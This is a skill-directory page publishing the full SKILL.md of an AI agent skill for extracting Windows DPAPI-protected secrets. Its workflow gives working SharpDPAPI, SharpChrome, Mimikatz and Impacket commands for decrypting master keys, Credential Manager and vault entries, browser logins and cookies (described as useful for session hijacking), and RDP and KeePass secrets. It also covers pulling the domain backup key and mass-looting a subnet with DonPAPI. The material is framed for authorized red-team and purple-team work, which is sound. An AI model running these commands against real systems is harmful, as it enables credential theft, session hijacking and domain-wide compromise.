Agent skill

Abusing Dpapi For Credential Access

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Extract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or…

Apache-2.0Auto-check: warningsSecurity

Install Abusing Dpapi For Credential Access

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill abusing-dpapi-for-credential-access -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills abusing-dpapi-for-credential-access --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/abusing-dpapi-for-credential-access .claude/skills/abusing-dpapi-for-credential-access && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
abusing-dpapi-for-credential-access
GitHub stars
34k
Token cost
~2.7k tokens
SKILL.md length
882 words
Files
5 (incl. scripts, references)
Skills in repo
639
Repo updated
First seen
Licence
Apache-2.0

At a glance

Extract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or…

  • Works in 7 steps: Triage the host for DPAPI blobs → Decrypt user master keys offline… → Recover Credential Manager and Vault… → …
  • Tasks that involve Red teaming and adversary simulation
  • SKILL.md covers Overview, When to Use, Prerequisites and Objectives, plus 5 more sections
  • Runs Python scripts from its folder; calls pipx and git; reaches github.com

What it does

Abusing Dpapi For Credential Access is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Extract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or Impacket's dpapi.py, including domain-wide decryption via the DPAPI backup key. Use during authorized red-team credential-access engagements after gaining a foothold or when triaging DPAPI blobs pulled from a host.

Its SKILL.md is about 2.7k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).

It sits in Security, covering Red teaming and adversary simulation. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Tasks that involve Red teaming and adversary simulation

Example prompts

  • “/abusing-dpapi-for-credential-access”

Requirements

  • Python 3

Workflow steps

7 steps, taken from the step headings in SKILL.md.

  1. Triage the host for DPAPI blobs
  2. Decrypt user master keys offline (password or NTLM hash)
  3. Recover Credential Manager and Vault secrets
  4. Decrypt RDP, KeePass, and certificate secrets
  5. Extract browser credentials with SharpChrome
  6. Obtain the domain DPAPI backup key (Domain Admin)
  7. Remote / Linux-based triage (Impacket / DonPAPI)

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • pipx
    • git

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com

    Also links to:

    • book.hacktricks.wiki

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Abusing Dpapi For Credential Access loads about 2.7k tokens when it runs, and up to ~4k if it reads all its reference files. Until then it costs about 111 tokens; SKILL.md has 882 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~111
When it runs · the whole SKILL.md, loaded when a task matches
~2.7k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~4k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:80
    Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected Chrome/Edge logins, cookies, and state keys. |
  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:141
    SharpChrome decrypts Chrome/Edge logins and cookies. Modern Chromium uses an App-Bound "state key" that SharpChrome reso
  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:148
    SharpChrome.exe cookies /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /pvk:backup
  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:189
    | SharpChrome | Chromium logins/cookies/state-key decryption | https://github.com/GhostPack/SharpDPAPI |

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 882 words, ~2,669 tokens.

Download SKILL.mdSave it as .claude/skills/abusing-dpapi-for-credential-access/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.
name
abusing-dpapi-for-credential-access
description
Extract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or Impacket's dpapi.py, including domain-wide decryption via the DPAPI backup key. Use during authorized red-team credential-access engagements after gaining a foothold or when triaging DPAPI blobs pulled from a host.
domain
cybersecurity
subdomain
red-teaming
tags
red-team, credential-access, dpapi, sharpdpapi, post-exploitation, active-directory, windows, mimikatz
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
DE.CM-01
mitre_attack
T1555.004

Abusing DPAPI for Credential Access

Legal Notice: This skill is for authorized penetration testing, red-team engagements, and educational purposes only. Extracting credentials from systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud and abuse laws. Always operate within a signed rules-of-engagement and document every action.

Overview

The Windows Data Protection API (DPAPI) is the operating system's built-in symmetric-encryption service that applications use to protect secrets at rest: saved RDP and Windows Credential Manager credentials, web and Wi-Fi credentials in the Credential Vault, browser saved logins and cookies (Chrome/Edge), KeePass keys, certificate private keys, and Scheduled Task passwords. DPAPI derives a per-user (or per-machine) master key from the user's password (or the machine account secret), and that master key encrypts individual "DPAPI blobs." The encrypted master keys live under %APPDATA%\Microsoft\Protect\<SID>\ (user) and %WINDIR%\System32\Microsoft\Protect\ (machine).

Red teamers abuse DPAPI to recover plaintext secrets after gaining a foothold, mapping to MITRE ATT&CK T1555.004 (Credentials from Password Stores: Windows Credential Manager). There are three primary decryption paths:

  1. Online / context-based — running as the target user, DPAPI APIs (CryptUnprotectData) transparently decrypt the user's blobs. SharpDPAPI's /unprotect flag uses this.
  2. Offline with the user password or NTLM hash — decrypt the user's master keys with /password: or /ntlm:, then decrypt the blobs offline (great for triaged files pulled from a host).
  3. Domain-wide with the DPAPI backup key — Domain Admins can extract the domain's RSA DPAPI backup key (.pvk) once, then decrypt any domain user's master keys forever, online or offline, with /pvk:.

The canonical tooling is SharpDPAPI (GhostPack, a C# port of Mimikatz DPAPI functionality) for Windows, SharpChrome for browser secrets, and Mimikatz (dpapi::*) as the original implementation. On Linux, Impacket's dpapi.py and donpapi perform remote/offline triage.

When to Use

  • After compromising a Windows host where the user has saved RDP, browser, or vault credentials worth harvesting for lateral movement.
  • When you hold a user's password or NTLM hash and want to decrypt their DPAPI-protected secrets offline.
  • When you have Domain Admin and want to obtain the domain DPAPI backup key to decrypt any user's protected data across the estate.
  • When triaging exfiltrated Credentials, Vault, or Protect directories from disk images.
  • During purple-team exercises to validate detection of DPAPI master-key access and LSASS/Protect-folder reads.

Prerequisites

  • An authorized foothold (interactive session, beacon, or remote admin) on the target Windows host.
  • Knowledge of the target user's SID, and one of: the user's session, password, NTLM hash, or Domain Admin rights for the backup key.
  • Tooling (compile from source or use release binaries; obtain only from official upstreams):
bash
# SharpDPAPI / SharpChrome (GhostPack) — build with Visual Studio / msbuild
git clone https://github.com/GhostPack/SharpDPAPI.git
# Open SharpDPAPI.sln and build Release, or:
msbuild SharpDPAPI.sln /p:Configuration=Release

# Mimikatz (original DPAPI implementation)
# https://github.com/gentilkiwi/mimikatz/releases

# Linux remote/offline triage (Impacket)
pipx install impacket            # provides dpapi.py / impacket-dpapi
pipx install donpapi             # https://github.com/login-securite/DonPAPI

Objectives

  • Triage a host for DPAPI-protected credential, vault, RDP, and certificate blobs.
  • Decrypt user master keys online (/unprotect), with a password/hash, or with the domain backup key.
  • Recover plaintext Credential Manager and Vault secrets.
  • Extract browser saved logins and cookies with SharpChrome.
  • Obtain and reuse the domain DPAPI backup key for estate-wide decryption.

MITRE ATT&CK Mapping

Technique IDNameTacticRelevance
T1555.004Credentials from Password Stores: Windows Credential ManagerCredential AccessDPAPI protects Credential Manager / Vault entries; decrypting master keys and blobs recovers these stored credentials.
T1555.003Credentials from Password Stores: Credentials from Web BrowsersCredential AccessSharpChrome decrypts DPAPI-protected Chrome/Edge logins, cookies, and state keys.
T1003OS Credential DumpingCredential AccessExtracting master keys / backup keys is a form of credential material dumping.
Show full SKILL.md (328 more words)Show less

Workflow

1. Triage the host for DPAPI blobs

Run the SharpDPAPI triage command in the user's context to automatically enumerate and (where possible) decrypt credentials, vaults, RDG/RDP, and certificates:

powershell
# Online triage in the current user's context (uses CryptUnprotectData)
SharpDPAPI.exe triage /unprotect

# Machine triage (requires local admin / SYSTEM) for machine-scoped blobs
SharpDPAPI.exe machinetriage
2. Decrypt user master keys offline (password or NTLM hash)

If you hold the user's password or hash, decrypt their master keys to a {GUID}:SHA1 mapping you can reuse against individual blobs:

powershell
# Decrypt all of the current/specified user's master keys with the password
SharpDPAPI.exe masterkeys /password:CorrectHorseBatteryStaple

# Decrypt master keys with the user's NTLM hash instead of the password
SharpDPAPI.exe masterkeys /ntlm:cc36cf7a8514893efccd332446158b1a

# Output is GUID:SHA1 lines — feed them to credentials/vaults commands
3. Recover Credential Manager and Vault secrets

Use the decrypted master-key mapping (or /pvk:) to decrypt the stored credentials and vault entries:

powershell
# Decrypt Credential Manager blobs with a GUID:SHA1 mapping
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1

# Or point at a target Credentials folder and decrypt with the domain backup key
SharpDPAPI.exe credentials /target:C:\Users\bob\AppData\Local\Microsoft\Credentials\ /pvk:backupkey.pvk

# Decrypt Credential Vault entries
SharpDPAPI.exe vaults /pvk:backupkey.pvk
4. Decrypt RDP, KeePass, and certificate secrets
powershell
# Saved RDCMan.settings RDP passwords (current user context)
SharpDPAPI.exe rdg /unprotect

# KeePass DPAPI-protected master keys
SharpDPAPI.exe keepass /unprotect

# Certificate private keys (export usable .pem with /showall for all stores)
SharpDPAPI.exe certificates /unprotect /showall
5. Extract browser credentials with SharpChrome

SharpChrome decrypts Chrome/Edge logins and cookies. Modern Chromium uses an App-Bound "state key" that SharpChrome resolves via DPAPI:

powershell
# Decrypt saved logins for the current user
SharpChrome.exe logins /unprotect

# Decrypt cookies (useful for session hijacking) in a target folder
SharpChrome.exe cookies /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /pvk:backupkey.pvk

# Resolve the AES state key explicitly
SharpChrome.exe statekeys /unprotect
6. Obtain the domain DPAPI backup key (Domain Admin)

With Domain Admin, retrieve the domain's RSA DPAPI backup private key once. This key decrypts every domain user's master keys indefinitely:

powershell
# Pull and save the domain backup key as a .pvk via the MS-BKRP RPC interface
SharpDPAPI.exe backupkey /server:dc01.corp.local /file:backupkey.pvk

Then decrypt any user's master keys offline with it:

powershell
SharpDPAPI.exe masterkeys /pvk:backupkey.pvk /target:C:\Users\alice\AppData\Roaming\Microsoft\Protect\
7. Remote / Linux-based triage (Impacket / DonPAPI)

From a Linux operator box, harvest and decrypt DPAPI secrets across hosts:

bash
# Decrypt a single masterkey file with Impacket using the domain backup key
impacket-dpapi masterkey -file <masterkey_file> -pvk backupkey.pvk

# Decrypt a credential blob with the recovered masterkey
impacket-dpapi credential -file <cred_blob> -key 0x<decrypted_masterkey>

# Mass remote DPAPI looting across hosts with DonPAPI
donpapi collect -u alice -p 'Password123!' -d corp.local --target 10.0.0.0/24

Tools and Resources

ToolPurposeLink
SharpDPAPIWindows DPAPI triage/decryption (C#)https://github.com/GhostPack/SharpDPAPI
SharpChromeChromium logins/cookies/state-key decryptionhttps://github.com/GhostPack/SharpDPAPI
MimikatzOriginal DPAPI (dpapi::*) implementationhttps://github.com/gentilkiwi/mimikatz
Impacket dpapi.pyRemote/offline DPAPI decryption (Python)https://github.com/fortra/impacket
DonPAPIMass remote DPAPI lootinghttps://github.com/login-securite/DonPAPI
HackTricks DPAPITechnique referencehttps://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html

Detection and OPSEC Notes

  • Master-key access and reads of \Microsoft\Protect\ and \Microsoft\Credentials\ are detectable; backupkey triggers an MS-BKRP RPC call to the DC.
  • The /unprotect (online) path is the stealthiest single-host option but only works as the live user.
  • Defenders should monitor for Sysmon process access to LSASS and abnormal access to Protect/Credentials folders (DE.CM-01).

Validation Criteria

  • Host triaged with SharpDPAPI triage / machinetriage.
  • User master keys decrypted via /unprotect, /password:, /ntlm:, or /pvk:.
  • Credential Manager and Vault secrets recovered.
  • RDP / KeePass / certificate secrets extracted where present.
  • Browser logins/cookies decrypted with SharpChrome.
  • Domain DPAPI backup key retrieved with Domain Admin (if in scope) and reused offline.
  • All recovered secrets documented with source host/user and ROE adherence confirmed.

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 4 other files (scripts, references) in skills/abusing-dpapi-for-credential-access of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • references/standards.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Abusing Dpapi For Credential Access next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Abusing Dpapi For Credential Access compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Abusing Dpapi For Credential Access this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.7kAutomated safety check: WarnApache-2.0
Authorization Bypass DetectionTencent/AI-Infra-Guard6.8k—~753Automated safety check: PassApache-2.0
Run Assert Evalresponsibleai/ASSERT327—~11kAutomated safety check: NotesMIT
Osint Methodologyelementalsouls/Claude-OSINT2.8k—~8.7kAutomated safety check: NotesMIT
Lfd Designelvisun/loss-function-development176—~2.9kAutomated safety check: NotesMIT
Acl AbuseADScanPro/Claude-AD209—~2.6kAutomated safety check: PassMIT

Similar skills

  • Authorization Bypass Detection

    Tencent/AI-Infra-Guard

    Probes an AI agent through dialogue for cross-user data access, privilege escalation and login bypass, and reports confirmed findings as structured vulnerability entries.

    6.8k GitHub stars~753 tokensUpdated today
    SecurityAuto-check passed
  • Run Assert Eval

    responsibleai/ASSERT

    Run an ASSERT evaluation against a described risk. An agent skill from responsibleai/ASSERT.

    327 GitHub stars~11k tokensUpdated today
    SecurityAuto-check: notes
  • Osint Methodology

    elementalsouls/Claude-OSINT

    Comprehensive OSINT methodology for external red-team operations and authorized attack-surface assessments.

    2.8k GitHub stars~8.7k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Lfd Design

    elvisun/loss-function-development

    Design a loss function and harness for a long-running /goal optimization run (loss-function development, LFD).

    176 GitHub stars~2.9k tokensUpdated 3 mo ago
    SecurityAuto-check: notes
  • Acl Abuse

    ADScanPro/Claude-AD

    Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…

    209 GitHub stars~2.6k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Web Exfiltration Detection

    Tencent/AI-Infra-Guard

    Probes whether an agent with web fetch and stored user memory can be tricked by a malicious page into leaking data through chained URL paths.

    6.8k GitHub stars~1.8k tokensUpdated today
    SecurityAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 639 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Abusing Dpapi For Credential Access

What does Abusing Dpapi For Credential Access do?

Extract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or…. Abusing Dpapi For Credential Access is an agent skill from mukul975/Anthropic-Cybersecurity-Skills.py, including domain-wide decryption via the DPAPI backup key.

When should I use Abusing Dpapi For Credential Access?

Abusing Dpapi For Credential Access fits situations like: tasks that involve Red teaming and adversary simulation.

How do I install Abusing Dpapi For Credential Access in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill abusing-dpapi-for-credential-access -a claude-code`. Or copy the skill folder (skills/abusing-dpapi-for-credential-access in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/abusing-dpapi-for-credential-access in your project. Claude Code loads it when a task matches its description.

How do I install Abusing Dpapi For Credential Access in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill abusing-dpapi-for-credential-access -a codex`. Or copy the skill folder (skills/abusing-dpapi-for-credential-access in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/abusing-dpapi-for-credential-access in your project. Codex loads it when a task matches its description.

Can I use Abusing Dpapi For Credential Access in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill abusing-dpapi-for-credential-access -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/abusing-dpapi-for-credential-access, .gemini/skills/abusing-dpapi-for-credential-access, .github/skills/abusing-dpapi-for-credential-access and .opencode/skills/abusing-dpapi-for-credential-access in your project.

What does Abusing Dpapi For Credential Access need to run?

Going by SKILL.md and its folder, Abusing Dpapi For Credential Access needs Python for the scripts in its folder and the command-line tools its instructions call (pipx and git). Our summary lists: Python 3.

Does Abusing Dpapi For Credential Access access the network?

SKILL.md names 2 domains. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. As links in the text: book.hacktricks.wiki. This is read from the text; nothing was executed.

Is Abusing Dpapi For Credential Access safe to install?

Our automated static check of SKILL.md flagged 4 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Abusing Dpapi For Credential Access use?

Abusing Dpapi For Credential Access is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Abusing Dpapi For Credential Access use?

About 2.7k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.3k tokens, read only when the agent opens those files.

What are the alternatives to Abusing Dpapi For Credential Access?

Skills that share tags, products or a category with Abusing Dpapi For Credential Access: Authorization Bypass Detection (Tencent/AI-Infra-Guard, 6.8k stars), Run Assert Eval (responsibleai/ASSERT, 327 stars), Osint Methodology (elementalsouls/Claude-OSINT, 2.8k stars) and Lfd Design (elvisun/loss-function-development, 176 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Abusing Dpapi For Credential Access?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,870 GitHub stars. The repository holds 639 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.